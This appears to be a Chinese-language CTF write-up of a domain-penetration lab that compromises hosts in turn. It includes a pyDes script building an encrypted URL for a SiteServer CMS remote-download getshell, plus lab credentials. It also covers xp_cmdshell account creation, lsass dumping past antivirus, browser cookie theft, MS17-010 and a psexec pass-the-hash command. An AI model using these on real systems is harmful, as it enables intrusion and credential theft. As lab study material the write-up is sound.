Dozer 域渗透系列 By 春
前言
因为有非预期的存在,导致题目究极白给,我会尽力按照预期解去写
题目质量很棒,期待来年再见
10.10.1.47 (Light_CMS)
是前几天红帽杯郭院士的那个后台Rce的改编版本
在testinclude下有文件包含
Rce
由于这个机器似乎会自动重启,完了还卡。主办方加了个后门
10.10.1.128 (官方后门)
起个msf就可以无脑上线了
10.10.1.234 (SiteServer)
注册账户,按照github复现下 (有一说一 默认给的exp路径居然不可写)
GitHub - zhaoweiho/SiteServer-CMS-Remote-download-Getshell: SiteServer CMS 5.x远程模板下载Getshell漏洞
这里要借助边界机器的web服务
from pyDes import *
import base64
iv = "\x12\x34\x56\x78\x90\xAB\xCD\xEF"
key = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5"
input_str = "http://10.10.1.47/upload/image/poxteam.zip"
#encrypt
k = des(key[0:8], CBC, iv,pad=None, padmode=PAD_PKCS5)
a = k.encrypt(input_str)
c = base64.b64encode(a)
d = c.replace("+", "0add0").replace("=", "0equals0").replace("&", "0and0").replace("?", "0question0").replace("/", "0slash0")
print d
#decrypt
en = d.replace("0add0","+").replace("0equals0","=" ).replace("0and0","&" ).replace("0question0","?").replace("0slash0","/")
#en = "ZjYIub/YxA2hc47NUFitAa/c/WMcuk7GQ4+P+eVq1v9u/TV3zrsdlbmZpWolkpKR"
b64en = base64.b64decode(en)
t = k.decrypt(b64en)
print t生成下加密url,访问就完事了
Bind_tcp
然后MSF就可以无脑上线了
flag在 web.config.bak
10.10.1.231 (MS-SQL)
可以在10.10.10.234 的webconfig看到配置信息
解密下
server=10.10.1.231;uid=sa;pwd=msO.9uXC;database=site测试过程 中发现远程又杀毒,进一步测试发现是卡巴斯基
而卡巴斯基不会拦截Xp_Cmdshell
即直接开启xp_cmdshell后命令执行即可
没降权。直接net user add就可以3389上去了
查看进程,有一个DozerOCS.exe
发现其是Alice用户起的
通过bypass下卡巴斯基的内存保护,可以dump lsass
但是里面没有Alice的hash 所以没啥用
这里其实可以直接把卡巴斯基卸载了,但是实战显然不适用
dump这文件的内存 String 下
获取alice密码
10.10.1.121 (PC)
用Alice用户登录pc
alice 后来都没开机 2333
10.10.1.250 (WordPress)
Alice 的 PC 里有高端的 Chrome浏览器
找下cookie。可以拿到WordPress的cookie
cookie上去 写个shell 直接Rce
10.10.1.1 (DC)
在上一台机器可以rce,是高权限的本地管理员。
可以直接dunp hash 里面有域管的hash
10.10.1.100 (Exchange)
看到域用户有个叫flag的,根据去年的经验,应该是exchange里有flag,直接改密码
net user flag !qaz2wsx用flag用户登录,Flag在邮箱里
预期据说不用改密码
以下为非预期
其实第一天拿到shell,发现域控17010 233333
直接拿到域管hash,全部pth上去拿flag
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9912e73b8ee265638b43d105fdb4c6f4 dozer/Administrator@10.10.1.1注
由于时间不太够了 而且shell有点点不稳,有的机器好像存在问题,有点不太好复现,暂时写非预期2333